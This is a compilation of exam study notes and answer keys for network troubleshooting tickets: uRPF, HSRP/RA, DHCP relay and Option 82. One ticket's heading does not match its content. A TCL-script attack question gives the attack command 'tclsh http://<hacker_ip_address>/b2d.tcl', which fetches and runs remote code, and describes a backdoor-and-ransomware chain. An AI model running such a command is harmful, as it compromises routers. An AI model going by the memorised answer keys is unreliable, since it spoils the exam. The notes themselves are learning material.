DIAG COMPILATION (Layer1)
Ticket 5 (uRPF, reply received in wrong interface)
(Topology diagram: R1 with links to R2 and R3)
Given: R1-R2 and R1-R3 are eBGP; R2-R3 is iBGP. R1 has uRPF configured on interface e0/2 (connected to R2).
Hint: R1 prefers the R1-R3 path to reach the Web (8.8.8.8, or the 0.0.0.0 default), but the Web prefers the R2-R1 path back to Host 1 (which is behind R1). The reply therefore enters R1 on e0/2 while R1's best path back to the source (8.8.8.8) points at R3, so uRPF on e0/2 drops it.
When a packet is received on an interface where Unicast RPF and ACLs are configured, processing happens in this order:
1. Input ACLs are checked.
2. Unicast RPF checks whether the packet arrived on the best return path to its source, by doing a reverse lookup in the FIB table.
3. The CEF (FIB) lookup is carried out for packet forwarding.
4. Output ACLs are checked.
5. The packet is forwarded.
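The five-stage order above, and why the asymmetric reply in this ticket dies at stage 2, as an added example (not part of the original compilation). The FIB contents, the prefixes and the interface names e0/1 and e0/3 are assumptions; only e0/2 towards R2, the R3 preference and Host 1 behind R1 come from the ticket. Strict mode is IOS `ip verify unicast source reachable-via rx`, loose mode is `reachable-via any`; the default route is ignored by both unless `allow-default` is set, which the model does not enable.

```python
import ipaddress

# Constructed FIB for R1 (assumed prefixes and interface names, see lead-in).
R1_FIB = {
    "10.1.0.0/24": "e0/1",   # Host 1's LAN (assumed)
    "8.8.8.8/32":  "e0/3",   # Web, best path via R3 (assumed interface name)
    "0.0.0.0/0":   "e0/3",   # default route, also via R3
}

def fib_lookup(fib, address, allow_default=True):
    """Longest-prefix match in the FIB; returns the egress interface or None."""
    addr = ipaddress.ip_address(address)
    best = None
    for prefix, iface in fib.items():
        net = ipaddress.ip_network(prefix)
        if net.prefixlen == 0 and not allow_default:
            continue
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None

def urpf_passes(fib, ingress_if, src, mode):
    """RFC 3704 reverse-path check as IOS applies it: 'strict' requires the best
    return path to src to leave through the ingress interface; 'loose' only
    requires some non-default route to src to exist."""
    return_if = fib_lookup(fib, src, allow_default=False)
    if return_if is None:
        return False
    return return_if == ingress_if if mode == "strict" else True

def process_packet(fib, ingress_if, src, dst, urpf_mode=None,
                   in_acl=lambda s, d: True, out_acl=lambda s, d: True):
    """Apply the ingress pipeline in the order the ticket lists it.
    Returns ('drop', stage) or ('forward', egress_if)."""
    if not in_acl(src, dst):                                            # 1. input ACL
        return ("drop", "input-acl")
    if urpf_mode and not urpf_passes(fib, ingress_if, src, urpf_mode):  # 2. uRPF
        return ("drop", "urpf")
    egress = fib_lookup(fib, dst)                                       # 3. CEF/FIB lookup
    if egress is None:
        return ("drop", "no-route")
    if not out_acl(src, dst):                                           # 4. output ACL
        return ("drop", "output-acl")
    return ("forward", egress)                                          # 5. forward

def web_reply_to_host1(urpf_mode):
    """The ticket's asymmetric reply: 8.8.8.8 -> Host 1 enters R1 on e0/2 (from R2)
    while R1's best path back to 8.8.8.8 is e0/3 (via R3)."""
    return process_packet(R1_FIB, "e0/2", "8.8.8.8", "10.1.0.10", urpf_mode)

if __name__ == "__main__":
    for mode in (None, "loose", "strict"):
        print(f"uRPF {str(mode):>6}: {web_reply_to_host1(mode)}")
```

Run it and the strict case returns `('drop', 'urpf')` while loose mode forwards via e0/1: the fix in the ticket is either to make the return path symmetric or to relax e0/2 from `reachable-via rx` to `reachable-via any`, which still blocks unrouted (spoofed) sources but tolerates asymmetric BGP paths.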
Ticket 6 (BGP Policy, ACL)
(Topology diagram: R1 with links to R2 and R3)
Hint: no uRPF in this ticket. An input ACL is configured on R1's eth1/0, the link to R2.
Description:
No IPv6 connectivity from the LAN to the Internet. CE1 and CE2 run HSRP for IPv6: CE1 is Active with Router-Preference Low and HSRP priority 200, CE2 is Standby with Router-Preference High and HSRP priority 100. HSRP preemption is configured on both.
Issue
The router with the higher Router-Preference wins. Check the console logs on the Host: the default route points to FE80::666. The router with the higher router-preference should have been the one with the higher HSRP priority. Only one router in the HSRP group is Active, and the current Active router (CE1) sends its RAs with "Low" preference, while a rogue device in the LAN sends RAs with the better "Medium" preference (the RFC 4191 default), so hosts take the ND RA from the rogue device and select it as their gateway.
Resolve
Set the HSRP priority on CE2 to the highest value, so it becomes Active (preemption is already on) and starts sending Router Advertisements with Router-Preference High.
Which line in Wireshark
Filter the RAs with "icmpv6.type==134" or "icmpv6.nd.ra.flag.prf". The first RA frame from the rogue address (FE80::666) is the answer (frame number 227 in the capture; it can differ, and you may need to search).
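How a host ends up behind the rogue router, and why raising CE2's priority fixes it, as an added example (not part of the original compilation): it decodes the Prf bits of a Router Advertisement the same way the `icmpv6.nd.ra.flag.prf` filter does and applies the RFC 4191 default-router selection. The RA bodies are constructed test data with a zero checksum; the HSRP virtual link-local address `fe80::1` is an assumption, while `fe80::666` is the rogue address from the ticket.

```python
import struct

ICMPV6_RA = 134  # the Wireshark filter icmpv6.type==134
# RFC 4191 'Prf' field: bits 4-3 of the RA flags byte
PRF_NAME = {0b01: "High", 0b00: "Medium", 0b11: "Low"}
PRF_RANK = {0b01: 2, 0b00: 1, 0b11: 0}
# type, code, checksum, cur hop limit, flags, router lifetime, reachable time, retrans timer
RA_HEADER = "!BBHBBHII"

def build_ra(prf, router_lifetime=1800):
    """Constructed 16-byte RA body (checksum left zero; test data, not a capture)."""
    flags = (prf & 0b11) << 3
    return struct.pack(RA_HEADER, ICMPV6_RA, 0, 0, 64, flags, router_lifetime, 0, 0)

def parse_ra(data):
    """Decode the fixed part of an ICMPv6 Router Advertisement (options ignored)."""
    if len(data) < 16:
        raise ValueError("RA too short")
    typ, _code, _csum, _hops, flags, lifetime, _reach, _retrans = struct.unpack(RA_HEADER, data[:16])
    if typ != ICMPV6_RA:
        raise ValueError(f"not a Router Advertisement (type {typ})")
    prf = (flags >> 3) & 0b11
    if prf == 0b10:          # reserved value: RFC 4191 says receivers treat it as Medium
        prf = 0b00
    return {"prf": prf, "prf_name": PRF_NAME[prf], "router_lifetime": lifetime}

def select_default_router(ras):
    """Pick the default router an RFC 4191 host chooses from (src link-local, raw RA)
    pairs: highest Prf among routers with a non-zero router lifetime; ties keep
    capture order because Python's sort is stable."""
    candidates = []
    for src, raw in ras:
        info = parse_ra(raw)
        if info["router_lifetime"] == 0:   # lifetime 0: not a default router
            continue
        candidates.append((PRF_RANK[info["prf"]], src, info["prf_name"]))
    if not candidates:
        return None
    candidates.sort(key=lambda c: c[0], reverse=True)
    return candidates[0][1], candidates[0][2]

HSRP_VIRTUAL = "fe80::1"   # assumed HSRP virtual link-local address
ROGUE = "fe80::666"        # rogue router address from the ticket

def before_fix():
    """CE1 is Active and advertises Low; the rogue device advertises the default Medium."""
    return select_default_router([(HSRP_VIRTUAL, build_ra(0b11)), (ROGUE, build_ra(0b00))])

def after_fix():
    """CE2 (Router-Preference High) made Active: the HSRP RA now carries High."""
    return select_default_router([(HSRP_VIRTUAL, build_ra(0b01)), (ROGUE, build_ra(0b00))])

if __name__ == "__main__":
    print("before:", before_fix())
    print("after: ", after_fix())
```

Note that the fix only works because the HSRP Active router is the one that sends RAs for the virtual address; setting Router-Preference High on the Standby router has no effect on what hosts see. The rogue RA itself is a separate problem that RA Guard on the access switches would address.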
Other feedback (multicast RP ticket):
Quick Solve
Answer: a static route (or mroute) on R3 towards the RP (R4):
ip route 10.1.4.1 255.255.255.255 10.0.0.17
(or ip mroute 10.1.4.1 255.255.255.255 10.0.0.17; IOS takes a subnet mask here, not a wildcard, so a mask of 0.0.0.0 is rejected as inconsistent with the host address)
Another version:
Which device?
Answer: R2
Cause
Answer: wrong RP configuration
Resolve
Answer: correct the RP configuration
---NEWEST DIAG---
DHCP Snooping
Additional Information
Server1 = new install, cannot get a DHCP IP from R1.
Server2 = new install, successfully retrieved a DHCP IP address from R1.
R1 = DHCP server.
SW1/SW2 = L2 only, DHCP snooping only.
SW3/SW4 = L2 + L3.
SW1 runs DHCP snooping. All interfaces are trusted, even the access ports, with [ip dhcp snooping trust]. SW1 is also passing Option 82 data upstream.
SW3 is the DHCP relay, with [ip dhcp relay information option] configured.
SW3 does NOT have [ip dhcp relay information trust-all] configured.
The packet capture shows DHCP Discover messages only (as far as DHCP is concerned). The packets are dot1q-tagged.
DHCP Offer, Request and Ack packets are never seen.
(This is consistent with the relay on SW3 dropping Discovers that arrive already carrying Option 82 with giaddr 0.0.0.0, which is exactly what [ip dhcp relay information trust-all], or [ip dhcp relay information trusted] on the ingress interface, tells it to accept.)
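The relay-side check that makes Server1's Discover disappear, as an added example (not part of the original compilation, and not Cisco's code): it builds a DHCPDISCOVER the way SW1 would forward it (Option 82 inserted, giaddr still 0.0.0.0) and models the decision an IOS relay makes with and without `ip dhcp relay information trust-all`. The MAC addresses, the circuit-id/remote-id values and the assumption that Server2's Discover reaches SW3 without Option 82 are constructed; the ticket gives none of them.

```python
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_MSG_TYPE, OPT_RELAY_AGENT, OPT_END = 0, 53, 82, 255
DHCPDISCOVER = 1
SUB_CIRCUIT_ID, SUB_REMOTE_ID = 1, 2
# op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr, chaddr, sname, file
BOOTP_FIXED = "!BBBBIHH4s4s4s4s16s64s128s"   # 236 bytes before the magic cookie

def build_discover(client_mac, giaddr="0.0.0.0", option82=None, xid=0x3903F326):
    """Constructed DHCPDISCOVER (not a capture). option82 = (circuit_id, remote_id)
    models what a snooping switch inserts before forwarding upstream."""
    zero4 = bytes(4)
    fixed = struct.pack(BOOTP_FIXED, 1, 1, 6, 0, xid, 0, 0x8000,
                        zero4, zero4, zero4, socket.inet_aton(giaddr),
                        client_mac.ljust(16, b"\x00"), bytes(64), bytes(128))
    opts = bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
    if option82 is not None:
        circuit_id, remote_id = option82
        sub = (bytes([SUB_CIRCUIT_ID, len(circuit_id)]) + circuit_id
               + bytes([SUB_REMOTE_ID, len(remote_id)]) + remote_id)
        opts += bytes([OPT_RELAY_AGENT, len(sub)]) + sub
    return fixed + MAGIC_COOKIE + opts + bytes([OPT_END])

def parse_options(pkt):
    """Return {option code: raw value} from the DHCP options field."""
    if pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, 240
    while i < len(pkt):
        code = pkt[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def giaddr_of(pkt):
    return socket.inet_ntoa(pkt[24:28])

def relay_decision(pkt, trust_all=False, interface_trusted=False):
    """Model of the IOS relay agent check the ticket hinges on: a client packet that
    already carries Option 82 but has giaddr 0.0.0.0 (it came from an L2 snooping
    switch, not from another relay) is dropped unless 'ip dhcp relay information
    trust-all' (global) or 'ip dhcp relay information trusted' (interface) is set.
    Returns ('forward', reason) or ('drop', reason)."""
    opts = parse_options(pkt)
    if OPT_RELAY_AGENT not in opts:
        return ("forward", "no Option 82 present; relay adds its own")
    if giaddr_of(pkt) != "0.0.0.0":
        return ("forward", "Option 82 came from a downstream relay (giaddr set)")
    if trust_all or interface_trusted:
        return ("forward", "Option 82 with giaddr 0.0.0.0 accepted from trusted source")
    return ("drop", "Option 82 with giaddr 0.0.0.0 from untrusted source")

# Server1's Discover as SW1 forwards it: Cisco-style circuit-id (vlan 10, module 1,
# port 5) and remote-id (switch MAC) sub-options, giaddr untouched. Constructed values.
SERVER1_DISCOVER = build_discover(
    bytes.fromhex("001122334455"),
    option82=(b"\x00\x04\x00\x0a\x01\x05", b"\x00\x06" + bytes.fromhex("aabbccddeeff")))
# Assumed: Server2's Discover reaches SW3 without Option 82.
SERVER2_DISCOVER = build_discover(bytes.fromhex("66778899aabb"))

if __name__ == "__main__":
    print("Server1, SW3 as configured:", relay_decision(SERVER1_DISCOVER))
    print("Server1, with trust-all:   ", relay_decision(SERVER1_DISCOVER, trust_all=True))
    print("Server2:                   ", relay_decision(SERVER2_DISCOVER))
```

The drop happens silently on the relay, which is why the capture on the access side shows Discovers and nothing else; `debug ip dhcp server packet` on SW3 is the quickest way to confirm it on a real box.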
TCL Script
Question 1
(Shows a PCAP)
Filter Wireshark with http.request.method==GET; that shows who issues the GET for the TCL script and who serves it (the source of the GET is the victim router, the destination is the hacker's server).
With those IPs (source/victim and hacker) you can eliminate 4 of the 9 answers.
To eliminate the last one, select "Hacker is trying to install ransomware via backdoor" (the other option is the exact opposite), so the correct answers are easy to pick.
For understanding:
1. HTTP session from A to B (A clicks a link it shouldn't and lands on B's phishing website).
2. TCL script downloaded from B (A is the one running the GET and downloads the .tcl from B).
3. TCP session from B to A (after A runs the TCL script it opens a backdoor port on itself, and B connects to A through that newly created backdoor).
4. Ransomware is installed via the backdoor (B installs ransomware on A using the backdoor created in step 3).
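The same role identification done in code, as an added example (not part of the original compilation): it applies the `http.request.method==GET` filter to constructed packet summaries, takes the source of the GET for a `.tcl` file as the victim (A) and its destination as the hacker (B), and then looks for the later TCP SYN from B back to A that is the backdoor connection (step 3 above). The addresses, frame numbers, the unrelated browsing packet and the backdoor port 4444 are assumptions; the exam pcap gives its own.

```python
# Constructed packet summaries standing in for the exam pcap (assumed values).
PACKETS = [
    {"no": 1, "src": "192.168.1.20", "dst": "198.51.100.7", "dport": 80, "flags": "PA",
     "payload": "GET /index.html HTTP/1.1\r\nHost: 198.51.100.7\r\n\r\n"},   # unrelated browsing
    {"no": 2, "src": "192.168.1.10", "dst": "203.0.113.5", "dport": 80, "flags": "PA",
     "payload": "GET /b2d.tcl HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n"},      # A fetches the script from B
    {"no": 3, "src": "203.0.113.5", "dst": "192.168.1.10", "dport": 51000, "flags": "PA",
     "payload": "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"},     # B serves it
    {"no": 4, "src": "203.0.113.5", "dst": "192.168.1.10", "dport": 4444, "flags": "S",
     "payload": ""},                                                          # B connects to A's new port
]

def http_get_requests(packets):
    """Equivalent of the Wireshark display filter http.request.method==GET."""
    return [p for p in packets if p["payload"].startswith("GET ")]

def requested_path(get_packet):
    """Request-target of an HTTP GET request line."""
    return get_packet["payload"].split(" ", 2)[1]

def is_syn(p):
    """Pure SYN (not SYN-ACK): a new connection being opened by p['src']."""
    return "S" in p["flags"] and "A" not in p["flags"]

def find_tcl_kill_chain(packets):
    """Steps 1-3 of the ticket: the host issuing GET for a .tcl is the victim (A),
    the server it fetches from is the hacker (B), and a later SYN from B to A is
    the backdoor connection. Returns None if no .tcl download is present."""
    for get in http_get_requests(packets):
        if not requested_path(get).lower().endswith(".tcl"):
            continue
        victim, hacker = get["src"], get["dst"]
        backdoor = next((p for p in packets
                         if p["no"] > get["no"] and p["src"] == hacker
                         and p["dst"] == victim and is_syn(p)), None)
        return {"victim": victim, "hacker": hacker, "script": requested_path(get),
                "backdoor_port": backdoor["dport"] if backdoor else None}
    return None

if __name__ == "__main__":
    print(find_tcl_kill_chain(PACKETS))
```

In Wireshark the equivalent second step is a filter such as `tcp.flags.syn==1 && tcp.flags.ack==0 && ip.src==<hacker>`, which lists every new connection the hacker opens towards the router after the download.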
========
Question 2
Which command was used to execute the attack?
a. sherkfest
b. sudo poweroff
c. tclsh with a copy to flash over HTTP: tclsh http://<hacker_ip_address>/b2d.tcl (the URL points at the host serving the script, B in the description above; the script name may differ in your exam)
Question 3
Which command, if issued from the hacker's end, can bring down the complete system?
a. sudo poweroff
Question 4
How to quickly fix this problem?
a. Kill the process.